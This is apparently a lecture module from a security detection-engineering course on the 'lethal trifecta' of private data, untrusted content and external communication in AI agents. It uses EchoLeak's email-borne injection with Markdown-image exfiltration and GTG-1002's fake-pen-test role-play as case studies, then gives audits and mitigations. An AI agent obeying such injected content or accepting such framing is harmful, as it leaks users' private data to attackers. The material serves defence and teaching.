Module 3.6 — The Lethal Trifecta

50-minute lecture · Day 3 afternoon · Closes Day 3, lab follows

Learning objectives

By end of this module, students can:

State the three legs of Simon Willison’s “lethal trifecta” — access to private data, exposure to untrusted content, ability to externally communicate
Audit any LLM-touching system against the trifecta, identifying which legs it satisfies
Apply at least three architectural patterns that break a leg of the trifecta, eliminating the class of vulnerability rather than just patching specific instances
Use the trifecta lens to interpret recent incidents (EchoLeak, GTG-1002, the broader EchoLeak class) as instances of the same root cause

The framing

Simon Willison published “The lethal trifecta for AI agents: private data, untrusted content, and external communication” on June 16, 2025. The framing identifies a structural vulnerability pattern in AI agent design:

If your agent combines these three features — access to private data, exposure to untrusted content, and the ability to externally communicate — an attacker can easily trick it into accessing your private data and sending it to that attacker.

The three legs:

Access to private data — Your emails, internal documents, databases, customer records, anything the LLM can read on your behalf. One of the most common purposes of tools in the first place — it’s why people deploy enterprise copilots.
Exposure to untrusted content — Any mechanism by which text (or images, video, audio) controlled by a malicious attacker could become available to your LLM. A web page, an incoming email, a third-party document, a public Slack channel, a customer support ticket.
Ability to externally communicate — Any path for the LLM to send data outward. Direct API calls. Sending emails. Rendering Markdown links or images (the EchoLeak exfil path). Posting to message queues. Updating a public dashboard.

The lethal property: when an agent simultaneously has all three, an attacker placing crafted content in the “untrusted content” surface can trick the agent into reading “private data” and sending it through the “external communication” channel — without the user ever knowing.

Source (canonical): simonwillison.net/2025/Jun/16/the-lethal-trifecta/

Why this framing matters

Detection engineering is often a long list of specific patterns: catch this jailbreak string, block this CVE, alert on that signature. The trifecta is architectural — it lets you reason about a class of vulnerabilities and design systems that don’t satisfy all three legs simultaneously.

The trifecta lens explains, in one frame:

EchoLeak (CVE-2025-32711) — M365 Copilot had all three legs. Private data (the user’s emails, OneDrive, SharePoint). Untrusted content (incoming email). External communication (Markdown image rendering through Teams proxy). The crafted email exploited all three at once.
GTG-1002 (Anthropic Nov 2025) — Claude Code agent had all three. Private data (target org’s internal systems). Untrusted content (the attacker’s role-play prompts disguised as legitimate penetration test). External communication (the agent’s outbound API calls and tool actions). The attacker arranged the situation so all three were active.
Bargury’s “Living off Microsoft Copilot” — every demonstrated attack technique fits the trifecta. CopilotHunter found “exposed bots” — bots configured to satisfy all three legs simultaneously.

The detection engineer’s value-add: instead of patching one vulnerability after another, audit your LLM-touching systems against the trifecta and decompose the ones that satisfy all three legs.

The trifecta audit pattern

For every LLM-touching system in your org, walk through the three legs:

System	Private data access?	Untrusted content exposure?	External communication?	All three?
M365 Copilot	✓ Outlook, OneDrive, SharePoint	✓ Inbound email content	✓ Markdown links/images via Teams proxy	YES — fix needed
Internal RAG chatbot (knowledge base only)	✓ Internal KB	? Depends on KB content provenance	? Depends on action capabilities	Maybe
Customer-facing support bot	✓ Customer-specific data via session	✓ Customer inputs	✓ Returns responses to customer	YES — fix needed
GitHub Copilot in dev IDE	✓ Local code	✓ Files opened in IDE	✗ No external comms beyond Microsoft API	NO — only two legs
Slack AI summarizing channel	✓ Channel history	✓ Any external user’s message	✓ Posts summary back to channel	YES — fix needed
Image-generation tool	✗ No private data	✓ User prompt	✓ Generates image	NO — only two legs
Slackbot that auto-replies to mentions	✓ Workspace content	✓ Mentioner’s message	✓ Replies in channel	YES — fix needed

A system flagged with three checkmarks is a trifecta-positive system. Trifecta-positive systems are the priority list for the SOC’s defensive architecture review.

The exercise to run with students: have them map the trifecta against their own org’s LLM-touching systems. Most teams discover 3-5 trifecta-positive systems they hadn’t recognized as a coherent risk class.

Architectural patterns that break a leg

When a system is trifecta-positive, the goal is to break at least one leg so the class of vulnerability is eliminated. Three viable patterns:

Pattern 1: Break the External Communication leg

The most common viable decomposition. Run the agent in a sandboxed, network-isolated environment where all outbound traffic is disabled or strictly whitelisted to non-attacker-controllable destinations.

Examples:

Quarantined inference: Run the LLM on an air-gapped node; results delivered to user via a separate review step
Whitelist outbound: The agent can only call specific approved APIs (your internal CRM, your internal ticketing) — not arbitrary URLs, not arbitrary domains
No image rendering in outputs: Disable Markdown image rendering in copilot responses — eliminates one major exfiltration vector (the EchoLeak path)

Pattern 2: Break the Untrusted Content leg

Ensure the agent only sees content that has been verified-trusted before reaching the LLM’s context. Concretely:

Provenance tagging: Every chunk of content the LLM ingests is tagged with its source. Untrusted sources (external emails, third-party APIs, public-web scrapes) are stripped of instruction-shaped content before reaching the LLM.
Pre-LLM injection screening: The Codex-generated detector from Module 3.4 + Llama Guard 3 / Prompt Guard 2 from Module 3.5 — content that fails screening doesn’t reach the LLM.
Isolated context windows: Different content sources go through separate LLM calls. The LLM that processes external email never has direct context to private data.

Pattern 3: Break the Private Data Access leg

Reduce the agent’s read scope to the absolute minimum. The agent can’t exfiltrate what it can’t access.

Just-in-time data access: The agent has no standing permission to read your inbox. When the user explicitly asks for an email summary, a separate fetcher retrieves only the needed emails, processes them in a constrained context, returns a summary. The agent never holds broad read permission.
Tenant isolation enforcement: Multi-tenant RAG systems must enforce that retrieval only returns content the requesting tenant owns. The LLM never sees cross-tenant data.
Sensitivity-tiered context: High-sensitivity data is loaded into the LLM only when needed for a specific user-authorized action, and only for the duration of that action.

Anthropic’s framing: the “Rule of Two”

A defensive heuristic increasingly cited in 2025-2026 enterprise-AI guidance: any AI agent should only satisfy a maximum of two legs of the trifecta. If an agent reads private data and processes untrusted content, it should not externally communicate. If an agent reads private data and externally communicates, it should not see untrusted content. Etc.

Instructor note: the “Rule of Two” formulation is increasingly common but verify the specific attribution and source-document before citing in delivery. The principle is widely held; the exact phrasing varies by vendor.

Recent incidents through the trifecta lens

EchoLeak (CVE-2025-32711, M365 Copilot)

✓ Private data: user’s Outlook + OneDrive + SharePoint
✓ Untrusted content: inbound email
✓ External communication: Markdown image rendering through Teams proxy

The fix Microsoft shipped (June 2025): disrupted the Markdown-image-rendering exfiltration path — broke the External Communication leg for that specific channel. Trifecta-positive status reduced for that specific attack path. Broader trifecta-positive status remains for any future not-yet-discovered exfiltration channel — which is why the EchoLeak class is more important than the specific CVE.

GTG-1002 (Anthropic Nov 2025, Claude Code agent)

✓ Private data: target organizations’ internal systems
✓ Untrusted content: attacker’s role-play prompts framing the engagement as “authorized pen test”
✓ External communication: the agent’s outbound API calls and tool invocations

Anthropic’s response was to detect and disrupt specific operator accounts, not to architecturally decompose Claude Code. The vulnerability class remains — the next adversary will use different operator credentials and different role-play framing. The trifecta is unbroken.

CopilotHunter exposing thousands of bots (Bargury BHUSA 2024)

Bargury’s research found enterprise Copilot deployments exposed externally — bots with private-data access and external communication capability that anyone could send untrusted content to. Each exposed bot was a trifecta-positive system. The “fix” — restricting external access — broke the Untrusted Content leg for the population of attackers (general internet) and reduced it to specific authenticated users.

The detection engineer’s role

For trifecta-positive systems that cannot be architecturally decomposed (because the business value depends on the agent having all three properties), the SOC’s role is to:

Layer detection across all three legs:
- Pre-LLM screening for untrusted content (Module 3.4 detector + Module 3.5 guardrails)
- Monitoring on private-data access patterns — alert on unusual scope, volume, or content categories
- Egress monitoring on external communication — detect data-shaped outputs, unusual destinations
Build canary tokens — high-entropy strings in the private-data store that should never appear in outputs. Any appearance = breach evidence.
Output-side data classification — every LLM response is scanned for sensitive content markers before delivery; sensitive content in unexpected contexts triggers HITL
Provenance tracking — every byte of content that influenced an LLM output is tagged with its source. After-the-fact investigation can trace exfiltration paths.

These controls don’t break a trifecta leg — they make exploitation noisy enough to detect. Detection is the fallback when architectural decomposition isn’t viable.

Discussion questions (~10 min)

Run the trifecta audit against your org’s existing LLM-touching systems. Which systems are trifecta-positive? For each, which leg is most economically viable to break? Which would require business approval to decompose?
EchoLeak was fixed by breaking the Markdown-image-rendering exfiltration path. Is that the same as breaking the External Communication leg? What other communication channels remain? Is the M365 Copilot deployment still trifecta-positive?
The “Rule of Two” heuristic says any AI agent should satisfy at most two legs. Your CISO objects: “but agents that can read data, act on the world, and process external input is the whole point — that’s the use case.” How do you frame the trade-off?

Common mistakes

Mistake	Better approach
Patching specific vulnerabilities without addressing the architecture	The trifecta lens explains why specific patches don’t generalize — class-of-vulnerability thinking
Auditing only the “top-tier” LLM deployments	Slack AI, internal Teams plugins, low-code agent builders often trip the trifecta without being on the SOC’s radar
Assuming “internal only” means trusted content	Internal content sources can still ingest untrusted content (user-submitted tickets, document uploads, third-party API responses)
Treating External Communication as “obviously needed”	Many LLM use cases don’t actually require external communication; assess before assuming
Stopping at one architectural fix	If the system is trifecta-positive, address all three legs across detection + architecture

Closing Day 3

Day 3 has covered:

LLM-authorship signals (3.1) — YARA rules for over-explanatory comments, AI-idiom naming, defensive over-handling
Polymorphic / runtime-generated malware (3.2) — PromptLock (NYU Tandon PoC) and BlackMamba lineage, network-detection patterns for outbound LLM API calls
OWASP LLM Top 10 (2025) (3.3) — 10 entries each mapped to a detection-engineering deliverable
EchoLeak / enterprise-copilot prompt injection (3.4) — CVE-2025-32711 deep dive, Codex-generated prompt-injection detector, seven-layer defense
Guardrails as SIEM telemetry (3.5) — Llama Guard 3, Prompt Guard 2, NeMo, Azure Prompt Shields wired as event sources, Codex integration sketch
The lethal trifecta (3.6) — Simon Willison’s framing, trifecta audit, three architectural patterns for breaking a leg

The architectural insight running through Day 3: the enterprise’s LLM-touching systems are themselves an attack surface. The trust boundary is no longer at the network perimeter — it’s inside the application, where untrusted content gets processed by privileged LLMs. The detection engineer’s controls must operate at that boundary.

Day 4 takes this further into agentic adversaries — the GTG-1002 class of attack — and AI supply-chain compromise. Day 5 is the capstone where students defend Verdancy Health against a multi-stage AI-orchestrated attack that includes EchoLeak-class prompt injection in Stage 3.